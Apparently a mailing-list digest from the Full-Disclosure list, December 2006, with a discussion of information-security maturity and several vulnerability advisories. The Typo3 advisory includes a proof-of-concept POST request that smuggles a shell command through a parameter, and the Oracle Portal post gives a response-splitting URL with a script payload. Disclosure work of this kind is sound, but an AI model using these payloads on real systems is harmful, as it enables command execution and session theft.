-------------- next part --------------
A non-text attachment was scrubbed...
Name: dos2.4.py
Type: text/x-python
Size: 1243 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061219/a8df619e/attachment-0001.py 
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: Esta parte del mensaje =?ISO-8859-1?Q?est=E1?= firmada
	digitalmente
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061219/a8df619e/attachment.bin 

From juha-matti.laurio at netti.fi  Tue Dec 19 20:34:24 2006
From: juha-matti.laurio at netti.fi (Juha-Matti Laurio)
Date: Tue, 19 Dec 2006 22:34:24 +0200 (EET)
Subject: [Full-disclosure] Skype worm in the wild
Message-ID: <8804348.672061166560465237.JavaMail.juha-matti.laurio@netti.fi>

This updated Websense information released on Tuesday states that it is a Trojan Horse, in fact:
http://www.websense.com/securitylabs/alerts/alert.php?AlertID=716

- Juha-Matti



From ktriv3di at msn.com  Tue Dec 19 20:16:29 2006
From: ktriv3di at msn.com (KT)
Date: Tue, 19 Dec 2006 12:16:29 -0800
Subject: [Full-disclosure] comparing information security to other industries
Message-ID: 

So we have been dealing with information security from last 20 years and still the world is at large lost. We still see banks vulnerable to trivial XSS attacks and software broken by buffer overflows. How do we compare to other industries like construction, engineering, finance? What I am trying to figure out is how mature we are and how long will it take for to get stable?
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061219/ad420d91/attachment.html 

From Valdis.Kletnieks at vt.edu  Tue Dec 19 21:17:38 2006
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Tue, 19 Dec 2006 16:17:38 -0500
Subject: [Full-disclosure] comparing information security to other
	industries
In-Reply-To: Your message of "Tue, 19 Dec 2006 12:16:29 PST."
	
References: 
Message-ID: <200612192117.kBJLHcSs024632@turing-police.cc.vt.edu>

On Tue, 19 Dec 2006 12:16:29 PST, KT said:
> So we have been dealing with information security from last 20 years and
> still the world is at large lost. We still see banks vulnerable to
> trivial XSS attacks and software broken by buffer overflows. How do we
> compare to other industries like construction, engineering, finance?
> What I am trying to figure out is how mature we are and how long will it
> take for to get stable?

20 years after the first automobile, we'd gotten as far as a Model A or T
or so.

Learning the ins and outs of stone arches took a millenium.  And then when
steel became available, it took several decades to learn that.

Finance?  When was Adam Smith's "The Wealth of Nations", and how long did
THAT take to really get understood? (For bonus points, how many centuries
between the first use of abstract counters as money, and Smith's understanding
of it? Why did *that* take so long?)

Science?  Einstein had a great year in 1905.  How many people understood
it by 1925?

(Incidentally, the fact that we still have a lot of security issues isn't
actually a software problem, so much as an innate lack of tools to help
humans understand *any* complex system, be it software, or the economy,
or global climate, or....)
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061219/cb0b1421/attachment.bin 

From wjefferies at fncinc.com  Tue Dec 19 21:02:03 2006
From: wjefferies at fncinc.com (Will Jefferies)
Date: Tue, 19 Dec 2006 15:02:03 -0600
Subject: [Full-disclosure] [WEB SECURITY] comparing information security
	to other industries
In-Reply-To: 
Message-ID: <894DD4E124622443AC0F44941BF565610785B991@ox-exch01.fncinc.com>

That's a tough question to address.  I don't think the security industry
will achieve perfection no more than the other industries you listed.

Like the other disciplines, research continues, but so do the evolution
of threats.  Construction and engineering is plagued with their own set
of challenges that must be overcome.

Buildings can be engineered and constructed with a high degree of
confidence, but a good, strong storm or earthquake can still bring them
down.  Security is the same in that sense.

We can evolve our knowledge and implementations, but a good, strong
storm (or careless error) can bring it all down :-)

 

My 0.02

 

Will

 

________________________________

From: KT [mailto:ktriv3di at msn.com] 
Sent: Tuesday, December 19, 2006 2:16 PM
To: full-disclosure at lists.grok.org.uk; websecurity at webappsec.org
Subject: [WEB SECURITY] comparing information security to other
industries

 

So we have been dealing with information security from last 20 years and
still the world is at large lost. We still see banks vulnerable to
trivial XSS attacks and software broken by buffer overflows. How do we
compare to other industries like construction, engineering, finance?
What I am trying to figure out is how mature we are and how long will it
take for to get stable?

Confidentiality Notice: This message is for the sole use of the intended recipient(s).
It may contain confidential or proprietary information and may be subject to the
attorney-client privilege or other confidentiality protections. If this message was
misdirected, neither FNC Holding Company, Inc. nor any of its subsidiaries waive any
confidentiality, privilege, or trade secrets. If you are not a designated recipient,
you may not review, print, copy, retransmit, disseminate, or otherwise use this message. 
If you have received this message in error, please notify the sender by reply e-mail 
and delete this message.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061219/5d797107/attachment.html 

From coderman at gmail.com  Tue Dec 19 22:10:24 2006
From: coderman at gmail.com (coderman)
Date: Tue, 19 Dec 2006 14:10:24 -0800
Subject: [Full-disclosure] comparing information security to other
	industries
In-Reply-To: <200612192117.kBJLHcSs024632@turing-police.cc.vt.edu>
References: 
	<200612192117.kBJLHcSs024632@turing-police.cc.vt.edu>
Message-ID: <4ef5fec60612191410n538b0414oa6b976e55865a4d2@mail.gmail.com>

On 12/19/06, Valdis.Kletnieks at vt.edu  wrote:
> On Tue, 19 Dec 2006 12:16:29 PST, KT said:
> > So we have been dealing with information security from last 20 years

i'd argue this is closer to 40 years than 20. [0]


> 20 years after the first automobile, we'd gotten as far as a Model A or T
> or so.

1885 [1] to 1965 [2] for decent auto security.  80 years?  add 10
years if you consider air bags the requisite threshold.


> (Incidentally, the fact that we still have a lot of security issues isn't
> actually a software problem, so much as an innate lack of tools to help
> humans understand *any* complex system, be it software, or the economy,
> or global climate, or....)

i argue that the vast majority of insecure computing problems are
indeed software problems, in the sense that proper software design and
development would fix them.  consider the automobile theme, where a
wheel, some pedals, and a few signalling levers allow you to operate a
vehicle with more computers and technology than space faring vehicles
from a mere 30 years past.  these machines are usable and secure,
despite their mind boggling technological complexity brought about
over a hundred years of evolutionary and radical improvement.

let's side step the economics and inertia of existing software / IT
practice and look at a future utopia for sake of argument:

A: usability is requirement #1 for security [3].  is configuring that
IPsec IKE/ISAKMP key distribution and re-key policy iPod (tm) simple?
how about generating PKI infrastructure for those OpenVPN connections?
 "security" products are so ridiculously complicated it's a wonder
anyone is able to use them.  for a good laugh, write down the steps
required to configure full disk encryption and a strong VPN from your
laptop to a server. LOL, ROFFLE, etc.

B: capability based computing is the norm, as identity based access
control is fundamentally flawed [4].  if you've only heard of
capability based security in passing, consider this an underscore of
the systemic and pervasive nature of our willful ignorance of good
practice.

C: consumers can recognize and compare the merits of security built
into systems they use, with producers willing and able to emphasize
security considerations during design, implementation, testing, and
support/integration phases of production and life cycle [5].

99.5% of existing problems disappear in such a world, leaving mostly
insider fraud to be addressed via process and policy.  we can get
there, but it ain't gonna happen soon...


0. "Capability-Based Computer Systems - Chap. 3 Early Capability Architectures"
    http://www.cs.washington.edu/homes/levy/capabook/
    [ref: Dennis and Van Horn @ MIT using Capabilities to describe
secure composition in 1966]

1. "History of the Automobile"
    http://en.wikipedia.org/wiki/History_of_the_automobile

2. "Unsafe at Any Speed"
    http://en.wikipedia.org/wiki/Unsafe_at_Any_Speed

3. "Secure Interaction Design"
    http://www.ischool.berkeley.edu/~ping/sid/

4. "Capability Security Model"
    http://c2.com/cgi/wiki?CapabilitySecurityModel

5. "Build Security In"
    https://buildsecurityin.us-cert.gov/



From nekramer at mindtheater.net  Wed Dec 20 00:22:56 2006
From: nekramer at mindtheater.net (Nancy Kramer)
Date: Tue, 19 Dec 2006 19:22:56 -0500
Subject: [Full-disclosure] comparing information security to other
	industries
In-Reply-To: 
References: 
Message-ID: 6.0.1.1.2.20061219191355.057f6eb0@mail.mindtheater.net

At 03:16 PM 12/19/2006, KT wrote:
>What I am trying to figure out is how mature we are and how long will it 
>take for to get stable?


Not very mature and it will take a long time to get stable because 
programmers are just beginning to be aware of application security 
requirements and then they need to figure out how to implement 
them.  Remember most programmers came from a client server or mainframe 
world and they "don't get it".  The consumer also doesn't "get it".  They 
work great together.

I went to a PHP Conference recently and the creator of PHP said that there 
is not such thing as a completely secure web application.  When failure is 
a goal you will definitely get there.

I know all this because I am a programmer by background.  Most people 
designing web applications know so little about security it is scary.

Regards,

Nancy Kramer
Webmaster http://www.americandreamcars.com
Free Color Picture Ads for Collector Cars
One of the Ten Best Places To Buy or Sell a Collector Car on the Web



-- 
No virus found in this outgoing message.
Checked by AVG Free Edition.
Version: 7.1.409 / Virus Database: 268.15.23/591 - Release Date: 12/17/2006




From zdi-disclosures at 3com.com  Wed Dec 20 03:03:44 2006
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Tue, 19 Dec 2006 19:03:44 -0800
Subject: [Full-disclosure] ZDI-06-051: Mozilla Firefox SVG Processing Remote
 Code Execution Vulnerability
Message-ID: 

ZDI-06-051: Mozilla Firefox SVG Processing Remote Code Execution
            Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-051.html
December 19, 2006

-- CVE ID:
CVE-2006-6504

-- Affected Vendor:
Mozilla

-- Affected Products:
Mozilla Firefox 2.0.0.0
Mozilla Firefox 1.5.0.4 - 1.5.0.8

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since December 12, 2006 by Digital Vaccine protection
filter ID 4867. For further product information on the TippingPoint IPS:

    http://www.tippingpoint.com 

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Mozilla Firefox. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page.

The specific flaw exists in the browser's handling of SVG comment
objects. Firefox does not correctly handle requests to append SVG
comments to elements in other types of documents. Attempting such an
operation results in a memory corruption that can be exploited to
execute arbitrary code.

-- Vendor Response:
Mozilla has issued an update to correct this vulnerability. More details
can be found at:

    http://www.mozilla.org/security/announce/2006/mfsa2006-73.html

-- Disclosure Timeline:
2006.11.08 - Vulnerability reported to vendor
2006.12.12 - Digital Vaccine released to TippingPoint customers
2006.12.19 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by an anonymous researcher.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative
(ZDI) represents a best-of-breed model for rewarding security
researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used.
3Com does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, 3Com provides its
customers with zero day protection through its intrusion prevention
technology. Explicit details regarding the specifics of the
vulnerability are not exposed to any parties until an official vendor
patch is publicly available. Furthermore, with the altruistic aim of
helping to secure a broader user base, 3Com provides this vulnerability
information confidentially to security vendors (including competitors)
who have a vulnerability protection or mitigation product.



From jays at panix.com  Wed Dec 20 07:39:56 2006
From: jays at panix.com (Jay Sulzberger)
Date: Wed, 20 Dec 2006 02:39:56 -0500 (EST)
Subject: [Full-disclosure] [Discuss-gnuradio] VT receives NSF grant for
	SDR security (fwd)
Message-ID: 



---------- Forwarded message ----------
  Date: Tue, 19 Dec 2006 10:24:44 -0500
  From: David P. Reed 
  To: discuss-gnuradio at gnu.org
  Subject: Re: [Discuss-gnuradio] VT receives NSF grant for SDR security

  Greg - I think the concept of "software defined radio" being explored by the VT
  folks is a concept I persoally refer to as "crippled software radio".

  It is based on a discredited theory of "security" that was called a "secure
  kernel" when I was a student 30 years ago.  In other words - that there is a
  small, well-defined portion of a system that can be certified separately from
  the rest of the system, which has the essential property that its *correct*
  operation *guarantees* that the entire system will be secure according to *all
  possible interpretations* of the word secure.

  I worked on a project of this sort, and am currently ashamed that I helped
  perpetuate that charade.   I can only say that many others helped - it funded
  lots of work on "proving programs correct" - on the theory that it was feasible
  to prove small programs correct, and thus whole systems "secure".

  The big lie, of course, is that the researchers essentially redefined the word
  "secure" to mean the trivial notion of security that you couldn't compromise
  the "kernel".   Of course today we stare the fraudulence of that idea in the
  face: phishing, XSS, and other very dangerous attacks do not depend one whit on
  a failure to secure a "kernel" of the operating system, or even the "kernel" of
  a router.

  Yet the idea that incorrectness is the same thing as insecurity persists in
  such ideas as the idea that you need "hardware inegrity" to prevent attacks on
  radio systems.

  I suggest that it is impossible to carry on a dialog with folks like the VT
  researchers, because they must necessarily buy into the "certification of
  correctness" notion of security.    If they were concerned with "correctness"
  that would be fine - we could carry out a meaningful discussion about the
  difficulty of determining correctness in a system that is inherently focusing
  on getting reliable communications through unreliable channels (information
  theory).   But since they play to the gods of deterministic correctness -
  unreliability doesn't fit in their notion of "security" - they cannot even
  consider the idea that there is no "kernel" that can be certified to reduce
  risk.



  _______________________________________________
  Discuss-gnuradio mailing list
  Discuss-gnuradio at gnu.org
  http://lists.gnu.org/mailman/listinfo/discuss-gnuradio




From caruabertu at gmail.com  Wed Dec 20 08:05:33 2006
From: caruabertu at gmail.com (Albert)
Date: Wed, 20 Dec 2006 09:05:33 +0100
Subject: [Full-disclosure] [WEB SECURITY] comparing information security to
	other industries
Message-ID: <5b1697e10612200005s6413f244me722b147d00b0863@mail.gmail.com>

who are you? from which sector? country?
as published and reported,
there are actually six sigma systems even in IT - systems controlling
(chemical) manufacturing plant, (nuclear) power stations, oil tankers,
air-traffic control etc..., embedded systems in aircraft, cars etc..
          but I doubt whether the mass of product from the "software houses"
falls in this class.
albert

|-----Original Message-----
|From: KT [mailto:ktriv3di at msn.com]
|Sent: 19 December 2006 21:16
|To: full-disclosure at lists.grok.org.uk; websecurity at webappsec.org
|Subject: [WEB SECURITY] comparing information security to
|other industries
|
|So we have been dealing with information security from last 20
|years and still the world is at large lost. We still see banks
|vulnerable to trivial XSS attacks and software broken by
|buffer overflows. How do we compare to other industries like
|construction, engineering, finance? What I am trying to figure
|out is how mature we are and how long will it take for to get stable?
|
|
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061220/88fe2bd4/attachment.html 

From caruabertu at gmail.com  Wed Dec 20 09:41:38 2006
From: caruabertu at gmail.com (Albert)
Date: Wed, 20 Dec 2006 10:41:38 +0100
Subject: [Full-disclosure] comparing information security to other
	industries -
Message-ID: <5b1697e10612200141k7608284ai3fbaa56fb3681e9e@mail.gmail.com>

my mileage differs.

Far east competition using quality engineering and giving >2 years
guarantees around the 1980s made the crucial difference, not the
intervening >120  years since the invention of the modern car engines
OTTO DIESEL and WANKEL.

cf.: http://en.wikipedia.org/wiki/Timeline_of_motor_and_engine_technology

In 1973 most cars sold were as buggy as software is today.
New models suffered from design faults, poor choice of materials and
mass recalls were the order of the day.

20 years is thus more like the time needed for the complex machinery
to be made reliable, given the right legal penalties and consumer
pressures.


p.s. Nowadays, cars have not one but several processors and computers
inside these days - and are still reliable and resilient, easy to use
etc...

regards
Albert

|-----Original Message-----
|From: coderman [mailto:coderman at gmail.com]
|Sent: 19 December 2006 23:10
|To: Valdis.Kletnieks at vt.edu
|Cc: KT; full-disclosure at lists.grok.org.uk; websecurity at webappsec.org
|Subject: [WEB SECURITY] comparing information security to other industries -
|
|On 12/19/06, Valdis.Kletnieks at vt.edu  wrote:
|> On Tue, 19 Dec 2006 12:16:29 PST, KT said:
|> > So we have been dealing with information security from
|last 20 years
|
|i'd argue this is closer to 40 years than 20. [0]
|
|
|> 20 years after the first automobile, we'd gotten as far as a Model A
|> or T or so.
|
|1885 [1] to 1965 [2] for decent auto security.  80 years?  add
|10 years if you consider air bags the requisite threshold.
|
|
|> (Incidentally, the fact that we still have a lot of security issues
|> isn't actually a software problem, so much as an innate lack
|of tools
|> to help humans understand *any* complex system, be it
|software, or the
|> economy, or global climate, or....)
|
|i argue that the vast majority of insecure computing problems
|are indeed software problems, in the sense that proper
|software design and development would fix them.  consider the
|automobile theme, where a wheel, some pedals, and a few
|signalling levers allow you to operate a vehicle with more
|computers and technology than space faring vehicles from a
|mere 30 years past.  these machines are usable and secure,
|despite their mind boggling technological complexity brought
|about over a hundred years of evolutionary and radical improvement.
|
|let's side step the economics and inertia of existing software
|/ IT practice and look at a future utopia for sake of argument:
|
|A: usability is requirement #1 for security [3].  is
|configuring that IPsec IKE/ISAKMP key distribution and re-key
|policy iPod (tm) simple?
|how about generating PKI infrastructure for those OpenVPN connections?
| "security" products are so ridiculously complicated it's a
|wonder anyone is able to use them.  for a good laugh, write
|down the steps required to configure full disk encryption and
|a strong VPN from your laptop to a server. LOL, ROFFLE, etc.
|
|B: capability based computing is the norm, as identity based
|access control is fundamentally flawed [4].  if you've only
|heard of capability based security in passing, consider this
|an underscore of the systemic and pervasive nature of our
|willful ignorance of good practice.
|
|C: consumers can recognize and compare the merits of security
|built into systems they use, with producers willing and able
|to emphasize security considerations during design,
|implementation, testing, and support/integration phases of
|production and life cycle [5].
|
|99.5% of existing problems disappear in such a world, leaving
|mostly insider fraud to be addressed via process and policy.
|we can get there, but it ain't gonna happen soon...
|
|
|0. "Capability-Based Computer Systems - Chap. 3 Early
|Capability Architectures"
|    http://www.cs.washington.edu/homes/levy/capabook/
|    [ref: Dennis and Van Horn @ MIT using Capabilities to
|describe secure composition in 1966]
|
|1. "History of the Automobile"
|    http://en.wikipedia.org/wiki/History_of_the_automobile
|
|2. "Unsafe at Any Speed"
|    http://en.wikipedia.org/wiki/Unsafe_at_Any_Speed
|
|3. "Secure Interaction Design"
|    http://www.ischool.berkeley.edu/~ping/sid/
|
|4. "Capability Security Model"
|    http://c2.com/cgi/wiki?CapabilitySecurityModel
|
|5. "Build Security In"
|    https://buildsecurityin.us-cert.gov/
|
|---------------------------------------------------------------
|-------------
|The Web Security Mailing List:
|http://www.webappsec.org/lists/websecurity/
|
|The Web Security Mailing List Archives:
|http://www.webappsec.org/lists/websecurity/archive/
|http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
|
|



From research at sec-consult.com  Wed Dec 20 13:04:15 2006
From: research at sec-consult.com (SEC Consult Research)
Date: Wed, 20 Dec 2006 14:04:15 +0100
Subject: [Full-disclosure] SEC Consult SA-20061220-0 :: Typo3 Command
	Execution Vulnerability
Message-ID: <01c201c72437$5a415220$6769a8c0@SECClientDFAWin>

SEC-CONSULT Security Advisory < 20061220-0>
=======================================================================
                  title: Remote Command Execution in Typo3
                program: Typo3 Content Management System
     vulnerable version: 4.0.0 - 4.0.3
                         3.7 and 3.8 with rtehtmlarea extension
                         4.1beta
                 impact: critical
               homepage: http://www.typo3.com
                  found: 2006-11-21
                     by: D. Fabian / SEC-CONSULT / www.sec-consult.com
                         J. Greil  / SEC-CONSULT / www.sec-consult.com
         permanent link: http://www.sec-consult.com/272.html
=======================================================================

vendor description:
---------------

TYPO3 is a free Open Source content management system for enterprise 
purposes on the web and in intranets. It offers full flexibility and 
extendability while featuring an accomplished set of ready-made 
interfaces, functions and modules.

[Source: http://www.typo3.com]


vulnerability overview:
---------------

In version 4.0 and above, Typo3 includes a sysext named rtehtmlarea.
The extension can optionally also be installed on Typo3 versions below
4.0. This RTE HTML Editor allows spell checking, for which it uses the
command line tool 'aspell'.

When this program is called, unvalidated user input is used as argument 
to the system call. Login to the backend is /not/ required to exploit 
this vulnerability. 

This allows an attacker to execute arbitrary commands on the target
system.


vulnerability details:
---------------

The affected script resides in /typo3/sysext/rtehtmlarea/htmlarea/
plugins/SpellChecker/spell-check-logic.php which calls the vulnerable
script /typo3/sysext/rtehtmlarea/pi1/class.tx_rtehtmlarea_pi1.php.
It requires a GET parameter id with the pageid of an existing page.
When the POST parameter cmd is set to learn, the parameter userUid is
not validated and can be used by an attacker to inject code.

Here is the vulnerable code (line 208):
--- code ---
$AspellCommand = 'cat ' . $tmpFileName . ' | ' . $this->AspellDirectory
 . ' -a --mode=none' . $this->personalDictsArg . ' --lang=' .
 $this->dictionary . ' --encoding=' . $this->parserCharset . ' 2>&1';
print $AspellCommand . "\n";
print shell_exec($AspellCommand);
--- /code ---

There seems to be a second command execution vulnerability in the same
file in line 365. It is left as a task to the reader to exploit that
flaw.

For typo3 versions < 4.0, the rtehtmlarea extension is probably located
at /typo3/ext.


proof of concept:
--------------- 

Here is a sample POST request that writes a file 'shell.txt' into /tmp:

--- post request ---
POST /typo3/sysext/rtehtmlarea/htmlarea/plugins/SpellChecker/spell-
check-logic.php?id=1 HTTP/1.1
Host: www.typo3host.abc
User-Agent: none
Content-Type: application/x-www-form-urlencoded
Content-Length: 111

psell_mode=fast&to_p_dict=1&cmd=learn&userUid=test;+echo+'shell'+>+
/tmp/shell.txt+%23&enablePersonalDicts=true
--- /post request ---


vulnerable versions:
---------------

Versions 4.0 - 4.0.3 as well as 4.1beta seem to be vulnerable to the 
described attack. Also vulnerable are versions 3.7 and 3.8 if the 
rtehtmlarea extension is installed.
The issue has been resolved in version 4.0.4.


vendor status:
---------------
vendor notified: 2006-12-07
vendor response: 2006-12-07
patch available: 2006-12-20
coordinated disclosure: 2006-12-20

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Blindengasse 3
A-1080 Wien
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 15
Mail: research at sec-consult dot com
www.sec-consult.com 

EOF Daniel Fabian / @2006



From security at nruns.com  Wed Dec 20 14:32:01 2006
From: security at nruns.com (security at nruns.com)
Date: Wed, 20 Dec 2006 15:32:01 +0100
Subject: [Full-disclosure] NOD32 Antivirus DOC parsing Arbitrary Code
	Execution Advisory
Message-ID: 

n.runs AG					   
http://www.nruns.com/			              security at nruns.com
n.runs-SA-2006.004                                           20-Dec-2006
________________________________________________________________________

Vendor:	               ESET, http://eset.com
Affected Products:	ESET NOD32 Antivirus
Vulnerability:         Arbitrary Code Execution (remote) 
Risk:			HIGH

________________________________________________________________________

Vendor communication:

  2006/08/24		initial notification of ESET 
  2006/08/28		ESET Response
  2006/08/29		PGP keys exchange
  2006/08/29		PoC files sent to ESET
  2006/09/06		ESET initial feedback.
  2006/09/08		ESET confirmed the bug and fixed
  2006/09/08		ESET made available the updates
________________________________________________________________________

Overview:
 
Founded in 1992, ESET is a global provider of security software for
enterprises and consumers. ESET's award-winning, antivirus software system,
NOD32, provides real-time protection from known and unknown viruses,
spyware, rootkits and other malware. NOD32 offers the smallest, fastest and
most advanced protection available, with more Virus Bulletin 100% Awards
than any other antivirus product. ESET was named to Deloitte's Technology
Fast 500 five years running, and has an extensive partner network, including
corporations like Canon, Dell and Microsoft. ESET has offices in Bratislava,
SK; Bristol, U.K.; Buenos Aires, AR; Prague, CZ; San Diego, USA; and is
represented worldwide in more than 100 countries. 
The broad product platform protects Windows, Linux, Novell and MS DOS
machines.

Description:
Multiple vulnerabilities have been found in the file parsing engine.

In detail, the following flaw was determined:

- Divide by Zero in .CHM file parsing.
- Heap Overflow through Integer Overflow in .DOC File Parsing

The .DOC problem can lead to remote arbitrary code execution if an attacker
carefully crafts a file that exploits the aforementioned vulnerabilities.
The vulnerabilities are present in NOD32 Antivirus software versions prior
to the update v.1.1743.

Solution:
The vulnerabilities were reported on Aug 24 and an update has been issued on
Sep 08 to solve these vulnerabilities through the regular update mechanism.
________________________________________________________________________

Credit: 
Bugs found by Sergio Alvarez of n.runs AG. 
________________________________________________________________________

References: 
http://eset.com/support/updates.php?pageno=61 (NOD32 - v.1.1743)

________________________________________________________________________

The information provided is released by n.runs "as is" without warranty of
any kind. n.runs except all warranties, either express or implied, expect
for the warranties of merchantability. In no event shall n.runs be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if n.runs
has been advised of the possibility of such damages.
Distribution or Reproduction of the information is provided that the
advisory is not modified in any way.

Copyright 2006 n.runs. All rights reserved. Terms of use.



From hasecorp at hotmail.com  Wed Dec 20 14:19:02 2006
From: hasecorp at hotmail.com (putosoft softputo)
Date: Wed, 20 Dec 2006 14:19:02 +0000
Subject: [Full-disclosure] Oracle Portal 10g HTTP Response Splitting
Message-ID: 

Oracle Portal/Applications HTTP Response Splitting
--------------------------------------------------

Sample:

http:///webapp/jsp/calendar.jsp?enc=iso-8859-1%0d%0aContent-length=12%0d%0a%0d%0a%3Cscript%3Ealert('hi')%3C/script%3E

How an attack can be conducted?
-------------------------------

Oracle Portal is commonly used with Oracle Web Cache, which caches the most 
common used URLs.
Due to the related problem a malicious user can alter the content that the 
server will catch. It can be
used in attack to rogue cookies, usernames and passwords, etc...

Patch Information
--------------------

There is no patch at moment.


Workaround
---------------

Edit yourself calendar.jsp file and fix it, in about 5 seconds. Otherwise, 
wait for a long while an
official patch (between 6 months and 2 years).

Thanks to n0oN3

_________________________________________________________________
Acepta el reto MSN Premium: Correos m?s divertidos con fotos y textos 
incre?bles en MSN Premium. Desc?rgalo y pru?balo 2 meses gratis. 
http://join.msn.com?XAPID=1697&DI=1055&HL=Footer_mailsenviados_correosmasdivertidos



From falco at gentoo.org  Wed Dec 20 20:18:49 2006
From: falco at gentoo.org (Raphael Marichez)
Date: Wed, 20 Dec 2006 21:18:49 +0100
Subject: [Full-disclosure] [ GLSA 200612-19 ] pam_ldap: Authentication
	bypass vulnerability
Message-ID: <20061220201849.GA32669@falco.falcal.net>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200612-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Low
     Title: pam_ldap: Authentication bypass vulnerability
      Date: December 20, 2006
      Bugs: #153916
        ID: 200612-19

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

pam_ldap contains a vulnerability that may allow a remote user with a
locked account to gain unauthorized system access.

Background
==========

pam_ldap is a Pluggable Authentication Module which allows
authentication against LDAP directories.

Affected packages
=================

    -------------------------------------------------------------------
     Package            /  Vulnerable  /                    Unaffected
    -------------------------------------------------------------------
  1  sys-auth/pam_ldap        < 183                             >= 183

Description
===========

Steve Rigler discovered that pam_ldap does not correctly handle
"PasswordPolicyResponse" control responses from an LDAP directory. This
causes the pam_authenticate() function to always succeed, even if the
previous authentication failed.

Impact
======

A locked user may exploit this vulnerability to bypass the LDAP
authentication mechanism, possibly gaining unauthorized access to the
system.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All pam_ldap users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=sys-auth/pam_ldap-183"

References
==========

  [ 1 ] CVE-2006-5170
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5170

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200612-19.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061220/67968c0d/attachment.bin 

From falco at gentoo.org  Wed Dec 20 20:21:40 2006
From: falco at gentoo.org (Raphael Marichez)
Date: Wed, 20 Dec 2006 21:21:40 +0100
Subject: [Full-disclosure] [ GLSA 200612-20 ] imlib2: Multiple
	vulnerabilities
Message-ID: <20061220202140.GC32669@falco.falcal.net>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200612-20
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: imlib2: Multiple vulnerabilities
      Date: December 20, 2006
      Bugs: #154216
        ID: 200612-20

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

imlib2 contains several vulnerabilities that could lead to the remote
execution of arbitrary code or a Denial of Service.

Background
==========

imlib2 is an advanced replacement for image manipulation libraries such
as libXpm. It is utilized by numerous programs, including gkrellm and
several window managers, to display images.

Affected packages
=================

    -------------------------------------------------------------------
     Package            /  Vulnerable  /                    Unaffected
    -------------------------------------------------------------------
  1  media-libs/imlib2       < 1.3.0                          >= 1.3.0

Description
===========

M. Joonas Pihlaja discovered several buffer overflows in loader_argb.c,
loader_png.c, loader_lbm.c, loader_jpeg.c, loader_tiff.c, loader_tga.c,
loader_pnm.c and an out-of-bounds memory read access in loader_tga.c.

Impact
======

An attacker can entice a user to process a specially crafted JPG, ARGB,
PNG, LBM, PNM, TIFF, or TGA image with an "imlib2*" binary or another
application using the imlib2 libraries. Successful exploitation of the
buffer overflows causes the execution of arbitrary code with the
permissions of the user running the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All imlib2 users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=media-libs/imlib2-1.3.0"

References
==========

  [ 1 ] CVE-2006-4806
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4806
  [ 2 ] CVE-2006-4807
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4807
  [ 3 ] CVE-2006-4808
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4808
  [ 4 ] CVE-2006-4809
